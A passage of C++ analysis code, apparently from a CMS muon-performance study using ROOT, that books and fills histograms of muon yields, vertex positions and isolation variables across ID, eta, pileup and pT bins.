bd.what() << std::endl;\n throw std::runtime_error(\"Bad INI variables\");\n }\n \n}\n\nstd::vector<int> muon_pog::SampleConfig::toArray(const std::string& entries)\n{\n \n std::vector<int> result;\n std::stringstream sentries(entries);\n std::string item;\n while(std::getline(sentries, item, ','))\n result.push_back(atoi(item.c_str()));\n return result;\n\n}\n\n\nstd::vector<TString> muon_pog::TagAndProbeConfig::toArray(const std::string& entries)\n{\n \n std::vector<TString> result;\n std::stringstream sentries(entries);\n std::string item;\n while(std::getline(sentries, item, ','))\n result.push_back(TString(item));\n return result;\n\n}\n\n\nvoid muon_pog::Plotter::book(TFile *outFile)\n{\n\t \n TString sampleTag = m_sampleConfig.sampleName;\n \n outFile->cd(\"/\");\n outFile->mkdir(sampleTag);\n outFile->cd(sampleTag);\n \n outFile->mkdir(sampleTag + \"/Yields\");\n \n TH1::SetDefaultSumw2(kTRUE);\n \n // -- Yields\n outFile->cd(sampleTag + \"/Yields/\");\n m_2Dyields[\"RecoMuon\"] = new TH2D(\"Yields_RecoMuon\" ,\"Yields \" + sampleTag + \" RecoMuons \",IDName.size()+3,0,IDName.size()+3, region.size(),0,region.size());\n m_2Dyields[\"RecoMuon\"]->SetOption(\"COLTEXT\"); \n for (unsigned int nid=0; nid<IDName.size(); nid++) m_2Dyields[\"RecoMuon\"]->GetXaxis()->SetBinLabel(nid+1,IDName[nid]);\n m_2Dyields[\"RecoMuon\"]->GetXaxis()->SetBinLabel(IDName.size()+1, \"Total Pass Cut\");\n m_2Dyields[\"RecoMuon\"]->GetXaxis()->SetBinLabel(IDName.size()+2, \"Total\");\n m_2Dyields[\"RecoMuon\"]->GetXaxis()->SetBinLabel(IDName.size()+3, \"Total Events (weighted)\");\n for (unsigned int nre=0; nre<region.size(); nre++) m_2Dyields[\"RecoMuon\"]->GetYaxis()->SetBinLabel(nre+1,region[nre]);\n \n m_2Dyields[\"GenMuon\"] = new TH2D(\"Yields_GenMuon\" ,\"Yields GenMuons \" + sampleTag,4,0,4,region.size(),0,region.size());\n m_2Dyields[\"GenMuon\"]->SetOption(\"COLTEXT\"); \n m_2Dyields[\"GenMuon\"]->GetXaxis()->SetBinLabel(1, \"Total Events\");\n m_2Dyields[\"GenMuon\"]->GetXaxis()->SetBinLabel(2, \"Gen Muon Z\");\n m_2Dyields[\"GenMuon\"]->GetXaxis()->SetBinLabel(3, \"Gen Muon Others\");\n m_2Dyields[\"GenMuon\"]->GetXaxis()->SetBinLabel(4, \"Gen Muon Total\");\n for (unsigned int nre=0; nre<region.size(); nre++) m_2Dyields[\"GenMuon\"]->GetYaxis()->SetBinLabel(nre+1,region[nre]);\n\n m_plots[\"NumberOfGenMuonsFromZ\"] = new TH1D (\"NMuons_GenFromZ\", \" Number of GEN Muons from Z per Evt ; N. Muons; # entries\", 4, 0., 4.);\n m_plots[\"NumberOfGenMuonsOther\"] = new TH1D (\"NMuons_GenOther\", \" Number of GEN Muons (NOT from Z) per Evt ; N. Muons; # entries\", 4, 0., 4.);\n\n m_plots[\"NMuons\"] = new TH1D (\"NMuons\", \" Number of Muons per Evt ; N. Muons; # entries\", 4, 0., 4.);\n\n // Vertices\n for (unsigned int npu=0; npu<4; npu++){\n outFile->mkdir(sampleTag + \"/Vtx/\" + PUr[npu]);\n outFile->cd (sampleTag + \"/Vtx/\" + PUr[npu]);\n // Reco Vertex \n m_plots[PUr[npu]+\"RecoVtx_X\"] = new TH1D (\"RecoVtx_X_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position (RECO) ; X [cm]; # entries\", 200, 0., 0.2);\n m_plots[PUr[npu]+\"RecoVtx_Y\"] = new TH1D (\"RecoVtx_Y_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position (RECO) ; Y [cm]; # entries\", 200, 0., 0.2);\n m_plots[PUr[npu]+\"RecoVtx_Z\"] = new TH1D (\"RecoVtx_Z_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position (RECO) ; Z [cm]; # entries\", 240, 0., 24);\n m_plots[PUr[npu]+\"RecoVtx_XY\"] = new TH1D (\"RecoVtx_XY_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position (RECO) ; XY [cm]; # entries\", 400, 0., 0.4);\n // Gen Vertex\n m_plots[PUr[npu]+\"GenVtx_X\"] = new TH1D (\"GenVtx_X_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position (GEN) ; X [cm]; # entries\", 200, 0., 0.2);\n m_plots[PUr[npu]+\"GenVtx_Y\"] = new TH1D (\"GenVtx_Y_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position (GEN) ; Y [cm]; # entries\", 200, 0., 0.2);\n m_plots[PUr[npu]+\"GenVtx_Z\"] = new TH1D (\"GenVtx_Z_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position (GEN) ; Z [cm]; # entries\", 240, 0., 24);\n m_plots[PUr[npu]+\"GenVtx_XY\"] = new TH1D (\"GenVtx_XY_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position (GEN) ; XY [cm]; # entries\", 400, 0., 0.4);\n // Delta Vertex (Reco-Gen)\n m_plots[PUr[npu]+\"Vtx_DX\"] = new TH1D (\"Vtx_DX_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position ; #Delta X [cm]; # entries\", 100, 0., 0.01);\n m_plots[PUr[npu]+\"Vtx_DY\"] = new TH1D (\"Vtx_DY_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position ; #Delta Y [cm]; # entries\", 100, 0., 0.01);\n m_plots[PUr[npu]+\"Vtx_DZ\"] = new TH1D (\"Vtx_DZ_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position ; #Delta Z [cm]; # entries\", 240, 0., 24);\n m_plots[PUr[npu]+\"Vtx_DXY\"] = new TH1D (\"Vtx_DXY_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position ; #Delta XY [cm]; # entries\", 100, 0., 0.01);\n // Delta Vertex (Reco-Gen)\n m_2Dplots[PUr[npu]+\"Vtx_DXVsDY\"] = new TH2D (\"Vtx_DXVsDY_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position ; #Delta X [cm]; #Delta Y [cm]\", 100, 0., 0.01, 100, 0., 0.01);\n\n } // for(npu) \n \n for (unsigned int nid=0; nid<IDName.size(); nid++){\n outFile->mkdir(sampleTag + \"/KinIso_variables/\" + IDName[nid]);\n for (unsigned int nre=0; nre<region.size(); nre++){\n outFile->mkdir(sampleTag + \"/KinIso_variables/\" + IDName[nid] + \"/\" + region[nre]);\n for (unsigned int npu=0; npu<PUr.size(); npu++){\n\toutFile->mkdir(sampleTag + \"/KinIso_variables/\" + IDName[nid] + \"/\" + region[nre] + \"/\" + PUr[npu]);\n\toutFile->cd (sampleTag + \"/KinIso_variables/\" + IDName[nid] + \"/\" + region[nre] + \"/\" + PUr[npu]);\n\tfor (unsigned int npT=0; npT<pTr.size(); npT++){\n\t outFile->mkdir(sampleTag + \"/KinIso_variables/\" + IDName[nid] + \"/\" + region[nre] + \"/\" + PUr[npu] + \"/\" + pTr[npT]);\n\t outFile->cd (sampleTag + \"/KinIso_variables/\" + IDName[nid] + \"/\" + region[nre] + \"/\" + PUr[npu] + \"/\" + pTr[npT]);\n\t \n\t TString IDReg = IDName[nid] + region[nre] + PUr[npu] + pTr[npT];\n\t TString IDRegName = IDName[nid] + \"_\" + region[nre] + \"_\" + PUr[npu] + \"_\" + pTr[npT];\n\t TString IDRegTitle = \"ID:\" + IDName[nid] + \" - REGION:\" + region[nre] + \" - PU:\" + PUr[npu] + \" - pT:\" + pTr[npT];\n\t \n\t m_prof[IDReg+\"dXYVsPt\"] = new TProfile(\"dXYVsPt_\" + IDRegName, IDRegTitle + \" #Delta XY Vs Pt ; #Delta XY; p_{T} [GeV]\", 200, 0, 2. , 0., 100.);\n\t m_prof[IDReg+\"dZVsPt\"] = new TProfile(\"dZVsPt_\" + IDRegName, IDRegTitle + \" #Delta Z Vs Pt ; #Delta Z; p_{T} [GeV]\" , 200, 0, 2. , 0., 100.);\n\t m_prof[IDReg+\"PtVsdXY\"] = new TProfile(\"PtVsdXY_\" + IDRegName, IDRegTitle + \" Pt Vs #Delta XY ; p_{T} [GeV]; #Delta XY [cm]\", 100,0., 100, 0., 2.);\n\t m_prof[IDReg+\"PtVsdZ\"] = new TProfile(\"PtVsdZ_\" + IDRegName, IDRegTitle + \" Pt Vs #Delta Z ; p_{T} [GeV]; #Delta Z [cm]\", 100,0., 100, 0., 2.);\n\t m_prof[IDReg+\"PtVsVtx\"] = new TProfile(\"PtVsVtx_\" + IDRegName, IDRegTitle + \" Pt Vs #Vtx ; p_{T} [GeV]; N. Vtx\", 100,0., 100, 0., 60.);\n\n\t m_2Dplots[IDReg+\"PtVspdgID\"] = new TH2D(\"PtVspdgID_\" + IDRegName, IDRegTitle + \" Pt Vs PDG ID ; p_{T} [GeV]; Particle ID\", 100,0., 100, 1000, -1., 999.);\n\n\t m_plots[IDReg+\"NumGenJets\"] = new TH1D (\"NGenJets_\" + IDRegName, IDRegTitle + \" Number of GEN Jets ; GEN-Jets Multiplicity; # entries\", 7, -0.5, 6.5);\n\t\n\n\t for (unsigned int nISO=0; nISO<IsoName.size(); nISO++){\n\t outFile->mkdir(sampleTag + \"/KinIso_variables/\" + IDName[nid] + \"/\" + region[nre] + \"/\" + PUr[npu] + \"/\" + pTr[npT] + \"/\" + IsoName[nISO]);\n\t outFile->cd (sampleTag + \"/KinIso_variables/\" + IDName[nid] + \"/\" + region[nre] + \"/\" + PUr[npu] + \"/\" + pTr[npT] + \"/\" + IsoName[nISO]);\n\t \n\t IDReg = IDName[nid] + region[nre] + PUr[npu] + pTr[npT] + IsoName[nISO];\n\t IDRegName = IDName[nid] + \"_\" + region[nre] + \"_\" + PUr[npu] + \"_\" + pTr[npT] + \"_\" + IsoName[nISO];\n\t IDRegTitle = \"ID:\" + IDName[nid] + \" - REGION:\" + region[nre] + \" - PU:\" + PUr[npu] + \" - pT:\" + pTr[npT] + \" - ISO:\" + IsoName[nISO];\n\t \n\t m_plots[IDReg+\"ChHadIso\"] = new TH1D (\"ChHadIso_\" + IDRegName, IDRegTitle + \" Charged Hadron Isolation ; Charged Had. Iso.; # entries\", 40, 0., 10);\n\t m_plots[IDReg+\"NeHadIso\"] = new TH1D (\"NeHadIso_\" + IDRegName, IDRegTitle + \" Neutral Hadron Isolation ; Neutral Had. Iso.; # entries\", 40, 0., 10);\n\t m_plots[IDReg+\"PhIso\"] = new TH1D (\"PhIso_\" + IDRegName, IDRegTitle + \" Photon Isolation ; Photon Iso.; # entries\", 40, 0., 60);\n\t m_plots[IDReg+\"PUIso\"] = new TH1D (\"PUIso_\" + IDRegName, IDRegTitle + \" PU Isolation ; PU Iso.; # entries\", 40, 0., 60);\n\n\t m_prof[IDReg+\"VtxVsChHadIso\"] = new TProfile(\"VtxVsChHadIso_\" + IDRegName, IDRegTitle + \" Vtx Vs Charged Hadron Isolation ; N. Vtx; Charged Had. Iso.\", 60, 0., 60., 0., 10.);\n\t m_prof[IDReg+\"VtxVsNeHadIso\"] = new TProfile(\"VtxVsNeHadIso_\" + IDRegName, IDRegTitle + \" Vtx Vs Neutral Hadron Isolation ; N. Vtx; Neutral Had. Iso.\", 60, 0., 60., 0., 10.); \n\t m_prof[IDReg+\"VtxVsPhIso\"] = new TProfile(\"VtxVsPhIso_\" + IDRegName, IDRegTitle + \" Vtx Vs Photon Isolation ; N. Vtx; Photon Iso.\", 60, 0., 60., 0., 60.);\n\t m_prof[IDReg+\"VtxVsPUIso\"] = new TProfile(\"VtxVsPUIso_\" + IDRegName, IDRegTitle + \" Vtx Vs PU Isolation ; N. Vtx; PU Iso.\", 60, 0., 60., 0., 60.);\n\t \n\t m_plots[IDReg+\"TotalIso\"] = new TH1D (\"TotalIso_\" + IDRegName, IDRegTitle + \" Total Isolation ; Total Iso.; # entries\", 100, 0., 200);\n\t m_prof[IDReg+\"VtxVsTotalIso\"] = new TProfile(\"VtxVsTotalIso_\" + IDRegName, IDRegTitle + \" Vtx Vs Total Isolation ; N. Vtx; Total Iso.\", 60, 0., 60., 0., 200.);\n\t m_prof[IDReg+\"PtVsTotalIso\"] = new TProfile(\"PtVsTotalIso_\" + IDRegName, IDRegTitle + \" Pt Vs Total Isolation ; p_{T} [GeV]; Total Iso.\", 100,0., 100, 0., 200.);\n\t m_prof[IDReg+\"EtaVsTotalIso\"] = new TProfile(\"EtaVsTotalIso_\" + IDRegName, IDRegTitle + \" Eta Vs Total Isolation ; #eta; Total Iso.\", 48, -2.4, 2.4, 0., 200.);\n\t m_prof[IDReg+\"NumGenJetsVsTotalIso\"] = new TProfile(\"NGenJetsVsTotalIso_\" + IDRegName, IDRegTitle + \" Number of GenJets Vs Total Isolation ; GEN-Jets Multiplicity; Total Iso.\", 7, -0.5, 6.5, 0., 200.);\n\n\t m_plots[IDReg+\"TotalIsoNoDB\"] = new TH1D (\"TotalIsoNoDB_\" + IDRegName, IDRegTitle + \" Total Isolation w/o #Delta#beta ; Total Iso. (No #Delta#beta); # entries\", 100, 0., 200);\n\t m_prof[IDReg+\"VtxVsTotalIsoNoDB\"] = new TProfile(\"VtxVsTotalIsoNoDB_\" + IDRegName, IDRegTitle + \" Vtx Vs Total Isolation w/o #Delta#beta ; N. Vtx; Total Iso. (No #Delta#beta)\", 60, 0., 60., 0., 200.);\n\t m_prof[IDReg+\"PtVsTotalIsoNoDB\"] = new TProfile(\"PtVsTotalIsoNoDB_\" + IDRegName, IDRegTitle + \" Pt Vs Total Isolation w/o #Delta#beta ; p_{T} [GeV]; Total Iso. (No #Delta#beta)\", 100,0., 100, 0., 200.);\n\t m_prof[IDReg+\"EtaVsTotalIsoNoDB\"] = new TProfile(\"EtaVsTotalIsoNoDB_\" + IDRegName, IDRegTitle + \" Eta Vs Total Isolation w/o #Delta#beta ; #eta; Total Iso. (No #Delta#beta)\", 48, -2.4, 2.4, 0., 200.);\n\t m_prof[IDReg+\"NumGenJetsVsTotalIsoNoDB\"] = new TProfile(\"NGenJetsVsTotalIsoNoDB_\" + IDRegName, IDRegTitle + \" Number of GenJets Vs Total Isolation ; GEN-Jets Multiplicity; Total Iso. (No #Delta#beta)\", 7, -0.5, 6.5, 0., 200.);\n\n\t m_plots[IDReg+\"RelIso\"] = new TH1D (\"RelIso_\" + IDRegName, IDRegTitle + \" Relative Isolation ; Relative Iso.; # entries\", 100, 0., 1.);\n\t m_prof[IDReg+\"VtxVsRelIso\"] = new TProfile(\"VtxVsRelIso_\" + IDRegName, IDRegTitle + \" Vtx Vs Relative Isolation ; N. Vtx; Relative Iso.\", 60, 0., 60., 0., 1.);\n\t m_prof[IDReg+\"PtVsRelIso\"] = new TProfile(\"PtVsRelIso_\" + IDRegName, IDRegTitle + \" Pt Vs Relative Isolation ; p_{T} [GeV]; Relative Iso.\", 100,0., 100, 0., 1.);\n\t m_prof[IDReg+\"EtaVsRelIso\"] = new TProfile(\"EtaVsRelIso_\" + IDRegName, IDRegTitle + \" Eta Vs Relative Isolation ; #eta; Relative Iso.\", 48, -2.4, 2.4, 0., 1.);\n\t m_prof[IDReg+\"dXYVsRelIso\"] = new TProfile(\"dXYVsRelIso_\" + IDRegName, IDRegTitle + \" #Delta XY Vs Relative Isolation ; #Delta XY; Relative Iso.\", 200, 0, 2. , 0., 1.);\n\t m_prof[IDReg+\"dZVsRelIso\"] = new TProfile(\"dZVsRelIso_\" + IDRegName, IDRegTitle + \" #Delta Z Vs Relative Isolation ; #Delta Z; Relative Iso.\", 200, 0, 2. , 0., 1.);\n\t m_prof[IDReg+\"NumGenJetsVsRelIso\"] = new TProfile(\"NGenJetsVsRelIso_\" + IDRegName, IDRegTitle + \" Number of GenJets Vs Relative Isolation ; GEN-Jets Multiplicity; Relative Iso.\", 7, -0.5, 6.5, 0., 1.);\n\n\t m_plots[IDReg+\"RelIsoNoDB\"] = new TH1D (\"RelIsoNoDB_\" + IDRegName, IDRegTitle + \" Relative Isolation w/o #Delta#beta ; Relative Iso. (No #Delta#beta); # entries\", 100, 0., 2.);\n\t m_prof[IDReg+\"VtxVsRelIsoNoDB\"] = new TProfile(\"VtxVsRelIsoNoDB_\" + IDRegName, IDRegTitle + \" Vtx Vs Relative Isolation w/o #Delta#beta ; N. Vtx; Relative Iso. (No #Delta#beta)\", 60, 0., 60., 0., 1.);\n\t m_prof[IDReg+\"PtVsRelIsoNoDB\"] = new TProfile(\"PtVsRelIsoNoDB_\" + IDRegName, IDRegTitle + \" Pt Vs Relative Isolation w/o #Delta#beta ; p_{T} [GeV]; Relative Iso. (No #Delta#beta)\", 100,0., 100, 0., 1.);\n\t m_prof[IDReg+\"EtaVsRelIsoNoDB\"] = new TProfile(\"EtaVsRelIsoNoDB_\" + IDRegName, IDRegTitle + \" Eta Vs Relative Isolation w/o #Delta#beta ; #eta; Relative Iso. (No #Delta#beta)\", 48, -2.4, 2.4, 0., 1.);\n\t m_prof[IDReg+\"dXYVsRelIsoNoDB\"] = new TProfile(\"dXYVsRelIsoNoDB_\" + IDRegName, IDRegTitle + \" #Delta XY Vs Relative Isolation w/o #Delta#beta ; #Delta XY; Relative Iso.\", 200, 0, 2. , 0., 1.);\n\t m_prof[IDReg+\"dZVsRelIsoNoDB\"] = new TProfile(\"dZVsRelIsoNoDB_\" + IDRegName, IDRegTitle + \" #Delta Z Vs Relative Isolation w/o #Delta#beta ; #Delta Z; Relative Iso.\", 200, 0, 2. , 0., 1.);\n\t m_prof[IDReg+\"NumGenJetsVsRelIsoNoDB\"] = new TProfile(\"NGenJetsVsRelIsoNoDB_\" + IDRegName, IDRegTitle + \" Number of GenJets Vs Relative Isolation w/o #Delta#beta ; GEN-Jets Multiplicity; Relative Iso.\", 7, -0.5, 6.5, 0., 1.);\n\t \n\t \n\t m_plots[IDReg+\"RelIsoCut\"] = new TH1D (\"RelIsoCut_\" + IDRegName, IDRegTitle + \" Relative Isolation Cut ; Relative Iso. Cut; # entries\", 101, 0., 1.01);\n\t \n\t for (unsigned int nISOcut=0; nISOcut<isowp[nISO].size(); nISOcut++){\n\t \n\t IDReg = IDName[nid] + region[nre] + PUr[npu] + pTr[npT] + IsoName[nISO] + isowp[nISO][nISOcut];\n\t IDRegName = IDName[nid] + \"_\" + region[nre] + \"_\" + PUr[npu] + \"_\" + pTr[npT] + \"_\" + IsoName[nISO] + \"_\" + isowp[nISO][nISOcut];\n\t IDRegTitle = \"ID:\" + IDName[nid] + \" - REGION:\" + region[nre] + \" - PU:\" + PUr[npu] + \" - pT:\" + pTr[npT] + \" - ISO:\" + IsoName[nISO] + \" - ISOWP:\" + isowp[nISO][nISOcut];\n\t \n\t m_plots[IDReg+\"NMuons\"] = new TH1D (\"NMuons_\" + IDRegName, IDRegTitle + \" Number of Muons per Evt ; N. Muons; # entries\", 4, 0., 4.);\n\t \n\t m_plots[IDReg+\"Vtx\"] = new TH1D (\"Vtx_\" + IDRegName, IDRegTitle + \" Vtx ; N. Vtx; # entries\", 60, 0., 60.);\n\t m_plots[IDReg+\"Pt\"] = new TH1D (\"Pt_\" + IDRegName, IDRegTitle + \" Pt ; p_{T} [GeV]; # entries\", 100,0., 100);\n\t m_plots[IDReg+\"Eta\"] = new TH1D (\"Eta_\" + IDRegName, IDRegTitle + \" Eta ; #eta; # entries\", 48, -2.4, 2.4);\n\t m_plots[IDReg+\"dXY\"] = new TH1D (\"dXY_\" + IDRegName, IDRegTitle + \" #Delta XY ; #Delta XY; # entries\", 200, 0, 2.);\n\t m_plots[IDReg+\"dZ\"] = new TH1D (\"dZ_\" + IDRegName, IDRegTitle + \" #Delta Z ; #Delta Z; # entries\", 200, 0, 2.);\n\t \n\t m_plots[IDReg+\"NumGenJets\"] = new TH1D (\"NGenJets_\" + IDRegName, IDRegTitle + \" Number of GEN Jets ; GEN-Jets Multiplicity; # entries\", 7, -0.5, 6.5);\n\t \t \n\t }// for(nISOcut)\n\t }// for(nISO)\n\t}// for(npT)\n }// for(npu)\n } // for(nre)\n } // for(nid)\n\n std::cout << \"All histograms have been created.\" << std::endl;\n \n} // void::book \n\nvoid muon_pog::Plotter::fillGen(const std::vector<muon_pog::GenParticle> & genpars, const muon_pog::Event & ev){\n\n // N. Muons\n int NmuonFromZ = 0;\n int NmuonOther = 0;\n \n float etaBarrel = 1.2; \n float pTeta = 20.0;\n \n // Number of Events \n m_2Dyields[\"GenMuon\"]->Fill(0.,0.);\n\n for (auto & genpar : genpars){\n\n if(abs(genpar.pdgId) == 13 &&\n genpar.pt > m_tnpConfig.probe_minPt &&\n fabs(genpar.eta) < 2.4 ){\n \n bool genZmuon = false;\n \n // Check this with flags!!!!\n if (hasMother(genpar, 13)) continue;\n \n // Z_id = 23\n genZmuon = hasMother(genpar, 23);\n \n for (unsigned int nre = 0; nre<4; nre++){\n\t\n\tbool etaRegion = false;\n\tif (nre == 0) etaRegion = true;\n\tif (nre == 1 && std::abs(genpar.eta) < etaBarrel) etaRegion = true;\n\tif (nre == 2 && std::abs(genpar.eta) >= etaBarrel) etaRegion = true;\n\tif (nre == 3 && (std::abs(genpar.eta) > 0.9 && std::abs(genpar.eta) < 1.3)) etaRegion = true;\n\t\n\tif (!etaRegion) continue;\n\t\n\tif (genZmuon) m_2Dyields[\"GenMuon\"]->Fill(1,nre); // From Z\n\telse m_2Dyields[\"GenMuon\"]->Fill(2,nre); \n\tm_2Dyields[\"GenMuon\"]->Fill(3,nre); // Number of GenMuons\n\t\n }// for(nre)\n \n if (genZmuon) NmuonFromZ++;\n else NmuonOther++;\n\n }//if(GenMuon)\n \n }// for(genpar) \n\n m_plots[\"NumberOfGenMuonsFromZ\"]->Fill(NmuonFromZ);\n m_plots[\"NumberOfGenMuonsOther\"]->Fill(NmuonOther);\n \n}\n \nvoid muon_pog::Plotter::fill(const std::vector<muon_pog::Muon> & muons,\n\t\t\t const muon_pog::HLT & hlt, const muon_pog::Event & ev, float weight)\n{\n\n // Total Number of Events \n m_2Dyields[\"RecoMuon\"]->Fill(IDName.size()+2.5, 0., weight);\n\n // Primary Vertices: Reco and from GenParticles\n std::vector<bool> IsPURegime;\n for (int bnpu = 0; bnpu<PUr.size(); bnpu++) IsPURegime.push_back( false );\n IsPURegime[FullPU] = true;\n IsPURegime[LowPU] = (ev.nVtx < 10);\n IsPURegime[MediumPU] = (ev.nVtx >= 10 && ev.nVtx < 35);\n IsPURegime[HighPU] = (ev.nVtx >= 35);\n\n TVector3 RecoVtx;\n RecoVtx.SetXYZ(ev.primaryVertex[0],ev.primaryVertex[1],ev.primaryVertex[2]);\n\n TVector3 GenVtx;\n bool FPrPar = true;\n for (auto & genpar : ev.genParticles){\n if(genpar.flags.at(7) == 1 && FPrPar){ // Flag 7: IsHardProcess\n GenVtx.SetXYZ(genpar.vx,genpar.vy,genpar.vz); \n FPrPar = false;\n } // if(flag == 7)\n } // for(genpar)\n \n for (unsigned int npu = 0; npu<PUr.size(); npu++){\n \n if (!IsPURegime[npu]) continue;\n\n m_plots[PUr[npu]+\"RecoVtx_X\"] -> Fill(RecoVtx.X(), weight);\n m_plots[PUr[npu]+\"RecoVtx_Y\"] -> Fill(RecoVtx.Y(), weight);\n m_plots[PUr[npu]+\"RecoVtx_Z\"] -> Fill(RecoVtx.Z(), weight);\n m_plots[PUr[npu]+\"RecoVtx_XY\"] -> Fill(RecoVtx.XYvector().Mod(), weight);\n \n m_plots[PUr[npu]+\"GenVtx_X\"] -> Fill(GenVtx.X(), weight);\n m_plots[PUr[npu]+\"GenVtx_Y\"] -> Fill(GenVtx.Y(), weight);\n m_plots[PUr[npu]+\"GenVtx_Z\"] -> Fill(GenVtx.Z(), weight);\n m_plots[PUr[npu]+\"GenVtx_XY\"] -> Fill(GenVtx.XYvector().Mod(), weight);\n \n m_plots[PUr[npu]+\"Vtx_DX\"] -> Fill(std::abs(RecoVtx.X() - GenVtx.X()), weight);\n m_plots[PUr[npu]+\"Vtx_DY\"] -> Fill(std::abs(RecoVtx.Y() - GenVtx.Y()), weight);\n m_plots[PUr[npu]+\"Vtx_DZ\"] -> Fill(std::abs(RecoVtx.Z() - GenVtx.Z()), weight);\n m_plots[PUr[npu]+\"Vtx_DXY\"] -> Fill(std::abs(RecoVtx.XYvector().Mod() - GenVtx.XYvector().Mod()), weight);\n \n m_2Dplots[PUr[npu]+\"Vtx_DXVsDY\"] -> Fill(std::abs(RecoVtx.X() - GenVtx.X()), std::abs(RecoVtx.Y() - GenVtx.Y()), weight);\n\n } // for(npu)\n\n // Number of GEN-Jets\n int NGenJets = ev.genjets.size();\n\n // Number of muons\n std::map<TString, int> number;\n // -- Initialization\n number[\"muons\"] = 0;\n for (unsigned int mid = 0; mid<IDName.size(); mid++)\n for (unsigned int nre = 0; nre<region.size(); nre++)\n for (unsigned int npu = 0; npu<PUr.size(); npu++)\n \tfor (unsigned int npT = 0; npT<pTr.size(); npT++)\t \n \t for(unsigned int iISO=0; iISO < IsoName.size(); iISO++)\n \t for(unsigned int isocat=0; isocat<isowp[iISO].size(); isocat++){\n \t TString iname = IDName[mid]+region[nre]+PUr[npu]+pTr[npT]+IsoName[iISO]+isowp[iISO][isocat]; \n \t number[iname+\"muons\"]=0;\n \t }\n \n // Muon General Cuts\n float etaBarrel = 1.2; \n float pTeta = 20.0;\n \n float DBfactor = m_tnpConfig.iso_DeltaBeta;\n\n // Isolation Cuts from config file\n std::vector< std::vector<float> > iISOwpFromUser; \n iISOwpFromUser.push_back({9999, m_tnpConfig.iso_LooseWP, m_tnpConfig.iso_TightWP});\n iISOwpFromUser.push_back({m_tnpConfig.isoPUPPI_LooseWP, m_tnpConfig.isoPUPPI_TightWP});\n iISOwpFromUser.push_back({m_tnpConfig.isoPUPPILep_LooseWP, m_tnpConfig.isoPUPPILep_TightWP});\n iISOwpFromUser.push_back({m_tnpConfig.isoPUPPINoLep_LooseWP, m_tnpConfig.isoPUPPINoLep_TightWP});\n iISOwpFromUser.push_back({m_tnpConfig.Miniiso_LooseWP, m_tnpConfig.Miniiso_TightWP});\n \n //---------------------------------------\n // PV comparison wrt the HP position ---\n //---------------------------------------\n // if( std::abs(RecoVtx.XYvector().Mod() - GenVtx.XYvector().Mod()) < 0.001 &&\n // std::abs(RecoVtx.Z() - GenVtx.Z()) < 5.0 ){\n\n for (auto & muon : muons){\n \n // Muons/Evt\n number[\"muons\"]++;\n\n // Total Number of Muons\n m_2Dyields[\"RecoMuon\"]->Fill(IDName.size()+1.5, 0., weight);\n \n // General Probe Muons\t \n if(muon.pt > m_tnpConfig.probe_minPt && \n fabs(muon.eta) < 2.4){\n\n // Number of Muons Passing (pT,eta) cuts\n m_2Dyields[\"RecoMuon\"]->Fill(IDName.size()+0.5, 0., weight);\n \n float dXY = std::abs(muon.dxyBest); \n float dZ = std::abs(muon.dzBest);\n\n bool IsSIGN = false;\n \n // ------- OLD ------- \n // Check first if muon comes from Z\n // Check \"hasGenMatch\" and \"hasNoGenMatch\"\n // IsSIGN = muon_pog::hasGenMatch(muon, ev.genParticles, m_tnpConfig.gen_DrCut, 23);\n\n // ------- NEW ------- \n // Check the SIMHit info\n IsSIGN = muon.IsMatchedPrimaryMuon;\n\n bool FillMuon = false;\n TString sampleTag = m_sampleConfig.sampleName;\n // Only prompt muons from signal\n if(sampleTag.Contains(\"SIGNAL\") && IsSIGN) FillMuon = true;\n // All events from QCD samples\n if(sampleTag.Contains(\"BACKGROUND\")) FillMuon = true;\n\n if (!FillMuon) continue;\n \n // Muon mother \n // ------- OLD ------- \n // int GenMatchMotherID = MotherGenMatch(muon, ev.genParticles, m_tnpConfig.gen_DrCut); // OLD Approach\n // ------- NEW ------- \n int GenMatchMotherID = muon.SimmotherPdgId; // New Approach: SIMHit Matching\n \n\n std::vector<bool> IsMuonID;\n for (int bmid = 0; bmid<IDName.size(); bmid++) IsMuonID.push_back( false );\n // New Selectors From MiniAOD\n IsMuonID[BinType::GLB] = muon.isGlobal ; \n IsMuonID[BinType::TRK] = muon.isTracker ; \n IsMuonID[BinType::LOOSE] = muon.Sel_CutBasedIdLoose ; \n IsMuonID[BinType::MEDIUM] = muon.Sel_CutBasedIdMedium ; \n IsMuonID[BinType::TIGHT] = muon.Sel_CutBasedIdTight ; \n IsMuonID[BinType::SOFT] = muon.Sel_SoftCutBasedId ; \n IsMuonID[BinType::HIGHpT] = muon.Sel_CutBasedIdGlobalHighPt ; \n IsMuonID[BinType::MEDIUMPrompt] = muon.Sel_CutBasedIdMediumPrompt ; \n IsMuonID[BinType::MVALOOSE] = muon.Sel_MvaLoose ; \n IsMuonID[BinType::MVAMEDIUM] = muon.Sel_MvaMedium ; \n IsMuonID[BinType::MVATIGHT] = muon.Sel_MvaTight ; \n\n std::vector<bool> IsEtaRegion;\n for (int bnre = 0; bnre<region.size(); bnre++) IsEtaRegion.push_back( false );\n IsEtaRegion[BinRegion::Full] = true;\n IsEtaRegion[BinRegion::Barrel] = (std::abs(muon.eta) < etaBarrel);\n IsEtaRegion[BinRegion::Endcap] = (std::abs(muon.eta) >= etaBarrel);\n IsEtaRegion[BinRegion::Overlap] = ((std::abs(muon.eta) > 0.9 && std::abs(muon.eta) < 1.3));\n\n std::vector<bool> IspTRegime;\n for (int bnre = 0; bnre<pTr.size(); bnre++) IspTRegime.push_back( false );\n IspTRegime[BinpTr::FullpT] = true;\n IspTRegime[BinpTr::LowpT] = (muon.pt < 20.);\n IspTRegime[BinpTr::MediumpT] = (muon.pt >= 20. && muon.pt< 50.);\n IspTRegime[BinpTr::HighpT] = (muon.pt >= 50. );\n\n for (unsigned int mid = 0; mid<IDName.size(); mid++){\n\n\tif (!IsMuonID[mid]) continue;\n\n\tfor (unsigned int nre 